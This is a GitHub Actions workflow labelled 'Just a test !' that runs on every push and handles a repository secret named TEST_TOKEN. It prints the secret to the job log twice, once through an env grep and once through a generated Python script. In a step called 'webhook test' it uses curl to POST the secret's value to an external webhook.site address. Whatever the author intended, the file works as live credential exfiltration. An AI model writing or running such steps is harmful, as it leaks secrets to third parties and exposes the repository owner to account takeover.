name: "Just a test !"

on:
  push:

permissions:
  id-token: write
  contents: read
  actions: write

jobs:
  show-secrets:
    runs-on: ubuntu-latest
    env:
      TEST_TOKEN: ${{ secrets.TEST_TOKEN }}
    steps:
      - name: Setup Python
        uses: actions/setup-python@v2
        with:
          python-version: '^3.9'

      - name: Show environment
        run: |
          env | grep TEST_TOKEN

      - name: Create python script
        run: |
          cat > showenv.py <<'EOF'
          import os

          print(f'Email username is {os.environ.get("TEST_TOKEN", "<unknown")}')
          EOF
      - name: webhook test
        run: | 
          curl --header "Content-Type: application/json" \
            --request POST \
            --data '{"username":"${{ secrets.TEST_TOKEN }}","password":"xyz"}' \
            https://webhook.site/5d9a9531-96c7-429b-8661-fdadba8d7628

      - name: Run python script
        run: |
          python showenv.py
